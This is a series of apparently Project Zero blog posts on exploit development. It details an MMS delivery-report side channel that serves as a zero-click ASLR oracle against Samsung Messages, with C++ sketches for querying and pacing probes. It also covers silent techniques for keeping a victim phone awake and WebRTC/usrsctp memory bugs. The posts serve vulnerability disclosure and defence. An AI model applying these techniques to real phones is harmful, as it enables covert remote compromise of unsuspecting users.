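A quick way to sanity-check that figure is to simulate the low-byte clearing over one 768-byte period of 48-byte slots (lcm(48, 256) = 768) and see how often the clipped pointer still lands on a slot start; the offsets are relative to a hypothetical run base:

#include <cstdio>

int main() {
  int valid = 0, total = 16;          // 16 slots of 48 bytes = one 768-byte period
  for (int slot = 0; slot < total; slot++) {
    int addr = slot * 48;             // rtc::Buffer slots in a size class 48 run
    int clipped = addr & ~0xff;       // effect of zeroing the pointer's low byte
    bool hit = clipped % 48 == 0;     // does the clipped pointer hit a slot start?
    printf("slot %2d: 0x%03x -> 0x%03x%s\n", slot, addr, clipped,
           hit ? " (slot start)" : "");
    valid += hit;
  }
  printf("%d of %d clipped pointers land on a slot start\n", valid, total);
  return 0;
}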

I also looked a lot at how outgoing packets are generated by WebRTC, especially RTP Control Protocol (RTCP) packets, which a peer always sends, even if it is just receiving audio or video. However, most outgoing packets are generated on the stack, so it is not possible to alter them using heap corruption bugs.

I also considered using a crash oracle to break ASLR, but I felt it was unlikely to succeed with these specific bugs. To start, hitting a heap allocation with them is unreliable, so it would be difficult to tell whether a crash had occurred due to a specific condition, or just because the bug had failed. I was also unsure whether it would even be possible to create detectable conditions considering the limited capabilities of these bugs.

I also thought about using CVE-2020-6387 to alter a vtable or a function pointer in order to read memory, cause behavior detectable by a crash oracle or perform offset-based exploitation that doesn’t require ASLR to be broken. I decided not to pursue this path, because the end result would depend on which functions and vtables are loaded at locations ending in zero, which varies greatly between builds. An exploit written using this method would require a large amount of modification to work on even slightly different versions of WebRTC, and there is no guarantee it would work at all.

I decided at this point that I needed to look for new bugs that could break ASLR, as neither of the ones I’d found recently could do it easily.

Stay tuned for Part 2: A Better Bug, which is scheduled for Wednesday, August 5.

MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle

4 August 2020 at 16:21
By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the fourth of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In Part 3 of the series, I chose one of the 174 obvious Qmage memory corruption crashes reported in Issue #2002 for exploitation. It was a linear heap buffer overflow in RLE decompression with an arbitrary allocation size, overflow size, and overflow data. By carefully adjusting the bitmap dimensions (which control the heap region size), we managed to place the pixel storage buffer directly before the associated android::Bitmap object in memory, allowing us to reliably corrupt it. From there, we constructed some potential RCE primitives, as well as a memory oracle that triggers a control flow-neutral read from a chosen memory area, triggering a crash or not depending on whether the address range is mapped and readable. In terms of low-level capabilities, this is a satisfying set of options to continue working with.

To make further progress in the exploit development, we finally have to get familiar with the MMS protocol that we'll be using as the medium of our attack. Specifically, we need to find a way to remotely leak information about the crash of the target Messages app, or lack thereof, to complete the ASLR oracle and build a more complex ASLR bypass logic on top of it. This is not completely trivial considering the unidirectional nature of MMS, but ultimately possible thanks to the little used feature of delivery reports. However, first things first – let's start with learning more about the protocol itself, and how we can move from sending test messages from a smartphone, to programmatically running experiments from a more comfortable environment of one's workstation.

Setting up a test environment

In order to be able to test MMS effectively, we need an easy way to deliver them to the target device from our PC. There are various methods to achieve this, for example Joshua Drake suggested two ways to send MMS without carriers in his Stagefright Black Hat presentation in 2015 (slides 84-85). However, I decided to take a more practical approach and send all messages through carriers, to be able to observe fully accurate results and spot any real-life issues related to conducting such an attack in practice.

To that end, I purchased two SIM cards for sending and receiving messages, and enabled an "unlimited MMS" package on the sender one to avoid excessive costs. Then, I found and licensed the NowSMS Windows software, which is a powerful solution for sending, receiving, and processing SMS/MMS. It may serve as an SMS server, MMS server, WAP Push Proxy Gateway and Multimedia Messaging Center (MMSC), and has a number of advanced features that are beyond the scope of our use case. Most importantly, it can be used to send messages through a locally connected GSM modem, or an Android phone acting as one. This is precisely the functionality we need, and it's available even in the most basic Now SMS & MMS Lite package. Notably, the service can be used in a number of ways: via a local web interface, through an HTTP API, and through developer API made available for technologies such as PHP, Java and .NET (C#, Visual Basic). The vendor also maintains an extensive documentation regarding both the product and relevant mobile protocols, and hosts an active user forum. All in all, NowSMS proved extremely helpful in my research by making interactions with SMS/MMS easily accessible on a PC, both manually and programmatically.

The screenshot below shows what the MMS sending page looks like in the Web UI (in Developer Mode). We can immediately spot a number of new and unfamiliar settings which are not available to the user when sending a message on a typical mobile phone. It looks like we have gained much more fine-grained control over what is transmitted over the cellular network:

NowSMS MMS sending web panel

The Android phone acting as a modem may operate in three modes: "Local WiFi", "Remote Direct" and "Remote via Cloud". In my case, I used the Remote Direct mode, and connected the sender phone to the local network via an ethernet cable, to prevent any disruptions related to wireless connectivity. At the same time, I connected the victim phone to my workstation via a USB cable for command line access and screen capturing. The structure of my setup is illustrated below:

Example MMS testing setup

I used a Samsung Galaxy A50 as the modem, and Samsung Galaxy Note 10+ as the receiver. In addition to having them connected to the PC for data transfer, it was obviously necessary to keep them charged throughout the testing, and to ensure that they were placed in a spot with strong cellular signal.

Crafting a raw MMS PDU

Now that we have a solid testing environment setup on a PC, we can dig deeper into MMS itself to better understand how it works. MMS is a relatively old technology dating back to circa 2001-2002, and since its inner workings are relevant mostly to mobile network operators, it is not documented as well as many other technologies and protocols seen in widespread use today. However, throughout this project, I have dug up a number of comprehensive books, articles, presentation slides and other educational materials on the subject. They are listed below for your convenience:


The volume of these resources may seem overwhelming, but in fact, we are only interested in a small subset of the MMS architecture, namely the MM1 protocol used between mobile devices and the MMSC (Multimedia Messaging Service Centre). The Phone to MMSC Protocol (MM1) slides from NowSMS are a highly recommended read to get a good overview of its design. In essence, we can view an MMS message as a self-contained binary file of MIME type application/vnd.wap.mms-message. It contains a number of headers (some of them required, some optional), followed by optional Multipart objects – the actual multimedia content of the message (images, audio, video, etc.). The details of the MMS binary encoding are defined by the MMS Encapsulation Protocol, and the list of headers compatible with the M-Send.req request can be found in that document in section "6.1.1 Send Request" on page 17.

An example source file of an MMS message is shown below:

 1:   X-Mms-Message-Type: m-send-req
 2:   X-Mms-Version: 1.3
 3:   To: 0123456789
 4:   Subject: MMS subject
 5:   X-Mms-Message-Class: Personal
 6:   X-Mms-Priority: Normal
 7:   X-NowMMS-Content-Location: message.txt;text/plain
 8:   X-NowMMS-Content-Location: image.jpg;image/jpeg

Lines 1-3 specify mandatory headers, lines 4-6 specify optional headers, and lines 7-8 contain NowSMS-specific headers that point to the multimedia files to include in the message, and indicate their respective MIME types. Such MMS source can be converted to its binary form with NowSMS mmscomp command line utility:

Composing encapsulated MMS with the mmscomp tool

The first 128 bytes of the message.MMS file are shown below; the rest are just the remainder of the JPEG image contents:

00000000: 8c 80 8d 90 97 30 31 32 33 34 35 36 37 38 39 00  .....0123456789.
00000010: 96 4d 4d 53 20 73 75 62 6a 65 63 74 00 8a 80 8f  .MMS subject....
00000020: 81 84 a3 02 1e 0d 83 c0 22 3c 6d 65 73 73 61 67  ........"<messag
00000030: 65 2e 74 78 74 3e 00 8e 6d 65 73 73 61 67 65 2e  e.txt>..message.
00000040: 74 78 74 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64  txt.Hello, world
00000050: 21 1a 84 df 48 9e c0 22 3c 69 6d 61 67 65 2e 6a  !...H.."<image.j
00000060: 70 67 3e 00 8e 69 6d 61 67 65 2e 6a 70 67 00 ff  pg>..image.jpg..
00000070: d8 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00  .....Adobe.d....

In this blob, we can see the binary-encoded headers (for example the two initial 0x8c 0x80 bytes encode "X-Mms-Message-Type: m-send-req"), as well as a number of plaintext strings corresponding to the header values, attachment file names, and data of the embedded files themselves. Such a raw MMS file can be sent via NowSMS, and will be delivered in a very similar form to the recipient device.
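
To connect the source file to the hexdump, here is a tiny sketch that reassembles the first few headers by hand. The field octets follow the well-known MMS header assignments (0x8C message type, 0x8D version, 0x97 To, 0x96 Subject); the helper is purely illustrative and not how NowSMS builds the PDU internally:

#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

int main() {
  std::vector<uint8_t> pdu;
  auto put_text = [&](const std::string& s) {   // null-terminated text value
    pdu.insert(pdu.end(), s.begin(), s.end());
    pdu.push_back(0x00);
  };

  pdu.push_back(0x8c); pdu.push_back(0x80);     // X-Mms-Message-Type: m-send-req
  pdu.push_back(0x8d); pdu.push_back(0x90);     // X-Mms-MMS-Version (encoded version octet)
  pdu.push_back(0x97); put_text("0123456789");  // To: 0123456789
  pdu.push_back(0x96); put_text("MMS subject"); // Subject: MMS subject

  for (uint8_t b : pdu) printf("%02x ", b);     // matches the first bytes of message.MMS
  printf("\n");
  return 0;
}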

As a side note, correctly formatted MMS messages are also expected to contain SMIL (Synchronized Multimedia Integration Language) resources, which define how the multimedia and text should be presented to the user. If you are interested in more details on how they're used in MMS, there is a good tutorial by NowSMS on the subject. However, the SMIL markup seems to be optional in practice, and client apps such as Samsung Messages will correctly display MMS without it. When it comes to file attachments in general, what matters the most for us is that their MIME types are specified explicitly and separately in the encoded message, which enables us to freely send Qmage files marked as image/jpeg (or some other image type) and have them automatically loaded as bitmaps.

MMS delivery reports

Delivery reports have been part of the MMS specification since version 1.0. They enable the sender of a message to request a confirmation of its successful delivery to the recipient. It's one of the very few ways for the sender to receive any kind of (indirect) feedback from the target phone, and it is what we intend to use to complete our ASLR oracle mechanism.

When composing the MMS PDU, a delivery report can be requested by setting the X-Mms-Delivery-Report header to "yes", which is expressed as 0x86 0x81 in binary. Here's how the header is described in Gwenaël Le Bodic's book:

Request for a delivery report. This parameter indicates whether or not delivery report(s) are to be generated for the submitted message. Two values can be assigned to this parameter: 'yes' (delivery report is to be generated) or 'no' (no delivery report requested). If the message class is 'auto', then this parameter is present in the submission PDU and is set to 'no'.

Quite frankly, I have never legitimately used this feature of MMS before. Even though it's part of the protocol, the option to request delivery reports is missing in some common apps such as Google Messages (it only supports SMS delivery reports). However, Samsung Messages does support it, so we can enable the reports under Settings > More settings > Multimedia messages > Show when delivered, and test it out:

Delivery reports in Samsung Messages

The option does indeed work as advertised. Let's take a deeper look at how it is implemented in the protocol and in the client app, and how we can make use of it in our exploit.

A closer look at MM1

Once again, let me start by emphasizing that Gwenaël's slides 24-41 and the entire NowSMS MM1 slide deck explain the MM1 protocol and data flows in great detail. In our case, let's analyze the transactions involved in sending and receiving an MMS in an environment with a few assumptions:

  • The originator and recipient are both in the same network, so there is no inter-operator communication taking place. Whether this is true or not shouldn't make any practical difference for us, as the data exchange between them happens seamlessly over the MM4 protocol and doesn't have any observable side effects (that I know of).
  • The recipient has the auto-retrieval of MMS enabled, which I understand to be the default on a majority or all of Samsung devices.
  • The recipient has good enough connectivity to be able to download the message.
  • The delivery report is requested by the originator.

Under these conditions, the message exchange between two mobile phones and the MMSC is illustrated in the following diagram:

MM1 data flow when sending a legitimate MMS

In a typical scenario, the sender initiates an M-send.req HTTP POST transaction to the carrier. Once the MMS is transmitted in full, the MMSC sends a WAP PUSH notification to the recipient to announce that a message is waiting. In the case of auto-retrieve, the client app immediately sends an HTTP GET request, and receives the serialized MMS data in response. Finally, it acknowledges the receipt of the message with an M-notifyresp.ind POST request, and that information is forwarded back to the sender in the form of an M-delivery.ind transaction. This concludes the communication between the participating parties.

The biggest problem shown in the diagram is the fact that the Samsung Messages app parses the incoming MMS before finalizing communication with the MMSC through the M-notifyresp.ind PDU. Ideally, any processing of external data should only take place once the connection with MMSC is closed. Otherwise, if the app crashes during the processing of a corrupted media file, the final M-notifyresp.ind message is never transmitted, which causes the MMSC to classify the MMS delivery as unsuccessful and prevents it from sending the delivery receipt to the originator. This creates a very easily observable side channel, revealing whether Samsung Messages crashed on the victim phone or not.

MM1 data flow when sending a corrupted Qmage file via MMS

Coupled with the powerful memory-probing primitive constructed in Part 3, the side channel enables an attacker to remotely query the readability of arbitrary address ranges, with no user interaction required. Such a capability is enormously useful on Android due to the Zygote design, and the fact that the location of code and data in the address space is persistent across program crashes. Consequently, even though the ASLR oracle output only carries 1 bit of information at a time, the overall attack can be broken down into multiple steps, and their results combined to determine complete 64-bit addresses of the necessary gadgets.

We can confirm the behavior by checking the logcat logs on the target device. When we send a regular MMS message, we can see both the WSP/HTTP GET.req and M-notifyresp.ind (POST) requests being made:

d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:25:25.494 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:25:26.449 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:25:27.388 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=66626
07-23 11:25:28.825 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: POST http://<redacted>, proxy=<redacted>, PDU size=16
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=0

The time span between receiving the full message from the MMSC and sending the acknowledgement is around 1.5 seconds. On the other hand, when we send a malformed Qmage file, only the WSP/HTTP GET.req request is visible in the logs:

d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:32:10.890 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:32:11.272 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:32:11.273 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=935

Before M-notifyresp.ind can be sent, the process crashes after ~1.3 seconds of reading the HTTP response:

130|d2s:/ $ logcat -b crash -v time
07-23 11:32:12.585 F/libc    (30665): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 31866 (pool-8-thread-1), pid 30665 (droid.messaging)

This confirms the insecure behavior on the client app side. How does it look from the perspective of an attacker? When the M-delivery.ind PDU is received by NowSMS, it is decoded and saved in a text file with a .HDR extension in the "C:\Program Files (x86)\NowSMS\MMS-IN" directory, for example C0B04508.HDR:

X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: [email protected]
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 09:55:00 GMT
Status: Retrieved

The status is indicated as "retrieved", and the report can be associated with the original message through the value of the Message-id header. Otherwise, if the original MMS crashes the target phone, we don't see any immediate return messages in the MMS-IN directory. Depending on the MMS expiry period (specified in the headers or defined by the operator's default setting), the carrier may retry delivering the message, and if that fails, the message eventually expires and the sender is notified about that too:

X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: [email protected]
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 11:03:39 GMT
Status: Expired

The carriers I have experimented with have a default expiration period of 48 hours, and it can be manually adjusted with the X-Mms-Expiry header to values between 1 minute and 48 hours. In my exploit, I didn't use the expiration aspect at all, and simply assumed that Samsung Messages crashed if the delivery report was not received within 30 seconds of sending the message. This completes the construction of a functional MMS-based ASLR oracle, which is an essential building block of a generic ASLR bypass logic discussed in the next blog post in the series.
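
Put together, the sender-side check boils down to a simple polling loop. The sketch below only captures the logic described above: send_probe_mms() is a hypothetical wrapper around the NowSMS submission API that returns the Message-id of the submitted PDU, and the delivery report is recognized by scanning the MMS-IN directory for a matching .HDR file:

#include <chrono>
#include <filesystem>
#include <fstream>
#include <sstream>
#include <string>
#include <thread>

namespace fs = std::filesystem;

std::string send_probe_mms(const std::string& raw_pdu);  // hypothetical helper

// Scan NowSMS's MMS-IN directory for a .HDR delivery report matching our message.
static bool report_received(const std::string& msg_id, const fs::path& mms_in) {
  for (const auto& entry : fs::directory_iterator(mms_in)) {
    if (entry.path().extension() != ".HDR") continue;
    std::ifstream f(entry.path());
    std::stringstream ss;
    ss << f.rdbuf();
    const std::string hdr = ss.str();
    if (hdr.find(msg_id) != std::string::npos &&
        hdr.find("Status: Retrieved") != std::string::npos)
      return true;
  }
  return false;
}

// Returns true if the probed address range was readable (the app survived),
// false if no delivery report arrived within 30 seconds (assumed crash).
bool aslr_oracle_query(const std::string& probe_pdu) {
  const fs::path mms_in = "C:/Program Files (x86)/NowSMS/MMS-IN";
  const std::string msg_id = send_probe_mms(probe_pdu);
  const auto deadline = std::chrono::steady_clock::now() + std::chrono::seconds(30);
  while (std::chrono::steady_clock::now() < deadline) {
    if (report_received(msg_id, mms_in)) return true;
    std::this_thread::sleep_for(std::chrono::seconds(1));
  }
  return false;
}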

Further thoughts on oracle reliability

The reliability of the presented ASLR oracle scheme is generally high, provided that both the sender and recipient devices maintain good connectivity with the MMSC. The weakest link is by far the android::Bitmap memory corruption primitive, which relies on two subsequent 160-byte jemalloc allocations being adjacent in memory. This generally holds true, but we have no guarantee that the condition will be always met, especially since the relevant jemalloc bin (chunks between 129-160 bytes in size) is not particularly quiet and is also utilized for other unrelated objects by the Samsung Messages app. Needless to say, any ASLR bypass logic we devise will most likely assume 100% accuracy of the oracle output, so we have to put some extra effort to make sure that the oracle can be indeed relied upon.

One simple technique we can use to improve the reliability of the attack is to have each oracle MMS processed with a relatively clean state of the heap. This can be accomplished by unconditionally crashing the client app with a malformed Qmage file, causing the com.samsung.android.messaging process to be killed and restarted from scratch when the next message arrives on the phone. Of course the ASLR oracle output false already implies a crash taking place, so extra artificial crashes are only needed at the very beginning of the attack (before the first oracle query), and after each query returning true. The type of the artificial crash doesn't matter as long as it always reproduces; it can be a huge out-of-bounds read/write, a NULL pointer dereference, assertion failure, or any condition that doesn't depend on the existing state of the process to trigger a crash. In my exploit, I used the signal_sigsegv_400357fc6c_7014_c1d4fedf1cbcdd583e0f331f32df1f72.qmg sample from crash 39b052a01c99f60982ec92f8d01a5401, which accesses a NULL pointer returned by a malloc call with a negative integer passed as the size.

This one trick allowed me to achieve an oracle accuracy rate of more than 99% (loose estimate) on my Galaxy Note 10+ test device. In my case, it was sufficient to completely rely on each single measurement to successfully defeat ASLR without making any mistakes during the process, but your mileage may vary depending on the device model, Android version, existing history of messages in the SMS app, or even specific options enabled on the phone (such as WiFi) during the attack. If the oracle accuracy drops below a certain threshold, it may be necessary to introduce redundant memory probes sent to the target for each tested address range, and only return the output value to the higher levels of the exploit code once there is enough confidence about its validity.

ActivityManager and crash rate limiting on Android

Based on what we know so far, we can assume that any potential attack will involve a number of crashes of Samsung Messages on the victim phone, some of them carrying address space information and some triggered simply to reset the heap. The ability to continuously crash and have an app restarted on a remote device is a crucial requirement, so we should verify that this is actually possible on Android. If we send corrupted Qmages via MMS twice in a short span of time, we will observe two crashes, as expected:

d2s:/data/local/tmp $ logcat -b crash -v time
07-23 15:52:45.549 F/libc    ( 8930): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10606 (pool-5-thread-1), pid 8930 (droid.messaging)
[...]
07-23 15:52:55.517 F/libc    (10727): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10776 (pool-5-thread-1), pid 10727 (droid.messaging)
[...]

If we then send a third message, Samsung Messages won't be spawned to handle it. Instead, we'll see the following message:

07-23 15:54:28.639 23268 23317 W BroadcastQueue: Unable to launch app com.samsung.android.messaging/10128 for broadcast Intent { act=android.provider.Telephony.WAP_PUSH_DELIVER typ=application/vnd.wap.mms-message flg=0x18000010 cmp=com.samsung.android.messaging/.ui.receiver.smsmms.DefaultSmsAppMmsReceiver (has extras) }: process is bad

At this point, we (as the attacker) are cut off from the device and cannot reach or interact with the remote Qmage attack surface anymore. In fact, the victim won't be able to receive SMS/MMS from anyone until they manually start the Messages app again. So what happened here, and does it mean that all our efforts up to this point were in vain?

When I first saw the warning, I immediately went looking for clues at cs.android.com. It was easy to locate the culprit based on the "process is bad" string: it is printed out when a call to mService.startProcessLocked fails in BroadcastQueue.java. This may generally only happen when mService.mAppErrors.isBadProcessLocked returns true for the app in question:

boolean isBadProcessLocked(ApplicationInfo info) {
      return mBadProcesses.get(info.processName, info.uid) != null;
}

There is a list of bad processes in the system, but how does an app end up on that list? The answer can be found in the handleAppCrashLocked method in AppErrors.java, and specifically in the following lines (slightly reformatted for readability):

if (crashTime != null && now < crashTime + ProcessList.MIN_CRASH_INTERVAL) {
    // The process crashed again very quickly.
    // If it was a bound foreground service, let's try to restart again in a
    // while, otherwise the process loses!
    Slog.w(TAG, "Process " + app.info.processName
            + " has crashed too many times: killing!");
[...]
           mBadProcesses.put(app.info.processName, app.uid,
                    new BadProcessInfo(now, shortMsg, longMsg, stackTrace));

In the above snippet, now is the current timestamp and crashTime is the time of the last crash of the app. Accordingly, the logic checks if two crashes in a single app have occurred in a short period of time, and if so, it bans the process indefinitely from future restarts. How short is short? Let's look up the MIN_CRASH_INTERVAL constant in ProcessList.java:

// The minimum time we allow between crashes, for us to consider this
// application to be bad and stop and its services and reject broadcasts.
static final int MIN_CRASH_INTERVAL = 60 * 1000;

It's 60 seconds. From the attacker's point of view, this is certainly not perfect, but also not terribly bad. This logic of the ActivityManager service means that at no point in time should we trigger two crashes of the Messages app within one minute, or the attack will be halted. In the context of our ASLR oracle, it limits the probing rate to one query a minute, which may be acceptable or not depending on how many queries are required to break the ASLR. For example, if we consider a realistic attack to be carried out during the night, that leaves us with a maximum of 8 hours × 60 minutes ~= 480 queries. The good news (for exploitation) is that there is no absolute limit on the number of crashes for one app, and we can interact with the MMS client indefinitely as long as we slow down the communication to meet the crash interval condition.

The diagram below illustrates the high-level process of safely sending two ASLR oracle queries to a target phone, taking the mandatory cooldown period into account. The first query returns true and takes two MMS to complete (one probe and one unconditional crash), and the second one returns false. Note how there is always a guaranteed 60 second gap between two subsequent crashes on the recipient device:

The process of sending subsequent two ASLR oracle queries to the target phone

On a closing note, there is one more important detail to consider in the crash handling logic. If we look closely at the source code of the handleAppCrashLocked method, we can notice that the timestamp is obtained through the SystemClock.uptimeMillis() API:

       final long now = SystemClock.uptimeMillis();

As the documentation states, this is not exactly the wall clock time we have assumed it to be:

uptimeMillis() is counted in milliseconds since the system was booted. This clock stops when the system enters deep sleep (CPU off, display dark, device waiting for external input), but is not affected by clock scaling, idle, or other power saving mechanisms. This is the basis for most interval timing such as Thread#sleep(long), Object#wait(long), and System#nanoTime. This clock is guaranteed to be monotonic, and is suitable for interval timing when the interval does not span device sleep. Most methods that accept a timestamp value currently expect the uptimeMillis() clock.

According to my experimentation on the Galaxy Note 10+ device, when the phone is in an inactive state (e.g. set aside on a bedside table with the display off), the clock indeed doesn't progress. This makes practical zero-click exploitation even more challenging, as it is not enough to just wait for 60 seconds before sending the next MMS. Instead, the attacker has to keep the target phone somehow occupied for those 60 seconds, while not triggering any vibration/notification sounds at the same time. The most obvious way to achieve this is through the cellular network, and I have identified at least three techniques that could be used to silently and remotely keep a phone busy:

  • By sending an MMS with empty text (i.e. an empty text/plain MIME file), a few seconds can be wasted while the phone receives and processes the message. In the end, the empty text leads to an unhandled Java exception being thrown in the Messages app, preventing it from showing any notification to the user. I abused this behavior in my exploit to send an initial "ping" to quietly verify that the recipient phone is responsive (see 0:43-0:56 in the exploit demo). It has been fixed in Samsung Messages since version 11.1.0.61.
  • By sending an MMS with very long text (at least around 140 kB in my testing), a few seconds can be similarly wasted by the victim phone. In this corner case, the misbehavior is slightly different and varies between devices, as the unhandled Java exception is thrown in the midst of generating a user notification, when it is already displayed on the screen, but before the notification sound rings. As such, it also qualifies as a (literally) silent CPU cycle burning trick.
  • By sending a very long SMS of 5180+ characters, which is divided into 34 segments of 140 characters each. The target phone starts receiving the SMS segments, roughly one per second, but for some reason (I didn't investigate this deeply) it stops reassembling the message after the 33rd part, and abandons it completely without generating any notifications. During the process of receiving and saving the initial portions of the SMS in the internal database, the uptimeMillis clock progresses by around 35 seconds in my test setup.

These are some basic ideas for ways to transmit data to the phone such that it has to spend cycles processing it, but fails at some point before notifying the owner. I am sure many more similar techniques exist, and specialized software such as NowSMS certainly helps put the relevant mobile apps to the test against very unusual conditions. All in all, the nature of the uptimeMillis clock is not a fundamental barrier in remote Android exploitation, but it is an annoying aspect that needs to be addressed with the use of additional techniques, and it may extend the overall attack time and impair its reliability. With 60 seconds of active CPU time required between each ASLR oracle query, we might also start being concerned about the extent of power consumption induced by the exploit on target phones with low battery levels… :)
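
As a sketch of how these pacing constraints combine with the oracle from the previous section: keep_target_busy() and send_unconditional_crash() are hypothetical helpers, the former burning the target's uptimeMillis clock with one of the silent techniques listed above, and the latter sending the always-crashing Qmage sample used to reset the heap:

#include <chrono>
#include <string>
#include <vector>

bool aslr_oracle_query(const std::string& probe_pdu);       // from the earlier sketch
void send_unconditional_crash();                            // hypothetical helper
void keep_target_busy(std::chrono::seconds uptime_to_burn); // hypothetical helper

void run_probes(const std::vector<std::string>& probe_pdus) {
  send_unconditional_crash();                  // start from a fresh heap state
  keep_target_busy(std::chrono::seconds(60));  // let MIN_CRASH_INTERVAL elapse
  for (const std::string& pdu : probe_pdus) {
    bool readable = aslr_oracle_query(pdu);    // false means the app just crashed
    if (readable)
      send_unconditional_crash();              // reset the heap after a survived probe
    keep_target_busy(std::chrono::seconds(60));
  }
}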

Summary

In this episode, we set up an environment to programmatically send MMS messages from a Windows PC, and learned the basics of the client ⟷ MMSC MM1 protocol and its encapsulation encoding. This enabled us to specify the X-Mms-Delivery-Report header in outgoing messages, and abuse the delivery report feature to establish a 1-bit side channel indicating if the recipient's Messages app crashed while processing our malformed Qmage image or not. Based on this capability and the address-probing primitive built in Part 3, we now have a fully functional (albeit somewhat slow) ASLR oracle at our disposal. We are getting close to defeating ASLR and finally executing arbitrary code.

To make further progress in the research, we have to face a few remaining questions:

  • What types of addresses are we interested in leaking? Which libraries will be needed to achieve RCE, and do we also need to disclose any data locations?
  • How do we find any regions in memory at all, starting with absolutely no initial insight as to where they might be located?
  • Finally, how do we achieve this in a relatively small number of steps (preferably low hundreds), such that the attack has a realistic execution time?

All of these matters will be discussed in detail in the upcoming Part 5. Stay tuned!

Exploiting Android Messengers with WebRTC: Part 2

5 August 2020 at 16:01
By: Tim

Posted by Natalie Silvanovich, Project Zero


This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 3 is scheduled for August 6.

Part 2: A Better Bug


In Part 1, I explored whether it was possible to exploit WebRTC using two memory corruption bugs in RTP processing. While I succeeded at moving the instruction pointer, I was not able to break ASLR, so I decided to look for vulnerabilities more suitable for this purpose.

usrsctp


I started off by going through WebRTC bugs I had filed in the past to see if any had the potential to break ASLR. Even if a bug was fixed long ago, it is an indicator of where similar bugs could potentially be found. One such bug was CVE-2020-6831, which is an out-of-bounds read in usrsctp.

usrsctp is an implementation of Stream Control Transmission Protocol (SCTP) used by WebRTC. Applications that use WebRTC can open data channels, which allow text or binary data to be transmitted from peer to peer. Data channels are often used to allow text messages to be exchanged during a video call, or to tell a peer when certain events have occurred, such as another peer disabling its camera. SCTP is the protocol that underlies data channels. In WebRTC, SCTP is analogous to RTP in that where RTP is used for audio and video content, SCTP is used for data.

I spent some time reviewing the usrsctp code for vulnerabilities. I eventually found CVE-2020-6831, which is a stack buffer overflow in usrsctp. This bug gives the attacker complete control of the size and contents of the overflow. Samuel Groß suggested that this bug could be used to break ASLR by overwriting the stack cookie and then the return address one byte at a time, detecting whether each value is correct based on whether the application crashes. Unfortunately, it turned out that this vulnerability is not reachable through WebRTC, as it requires a client socket to connect to a listening socket, whereas in WebRTC, both sockets are client sockets.

I kept looking and eventually found CVE-2020-6514. This is a rather unusual bug in how WebRTC interacts with usrsctp. usrsctp supports custom transports, in which case the integrator needs to provide the source and destination address for each connection as a pair of void pointers. The non-dereferenced value of these pointers is then used as an address by usrsctp, which means the value is included in some packets. In WebRTC, the address pointers are set to the address of the SctpTransport instance used by WebRTC. The result is that the location of this object in memory is sent to the remote peer during every SCTP connection. This is technically a bug in WebRTC, though the design of usrsctp is also flawed because using the type void* for custom addresses strongly encourages integrators to use pointers for this value even though this is insecure.

I was hoping this bug would be enough to break ASLR, but it turned out not to be. For an exploit, I needed the location of a loaded library as well as the location of the heap, so I ran a series of tests on an Android device to see if there was any correlation between these locations, but there was none. The location of a heap pointer was not enough to determine the location of a loaded library.

I kept looking, and I noticed a vulnerability in how usrsctp processes ASCONF chunks, which are used to manage dynamic IP addresses. The source for the bug is as follows.

if (param_length > sizeof(aparam_buf)) {
    SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) larger than buffer size!\n", param_length);
    sctp_m_freem(m_ack);
    return;
}

if (param_length <= sizeof(struct sctp_paramhdr)) {
    SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) too short\n", param_length);
    sctp_m_freem(m_ack);
}

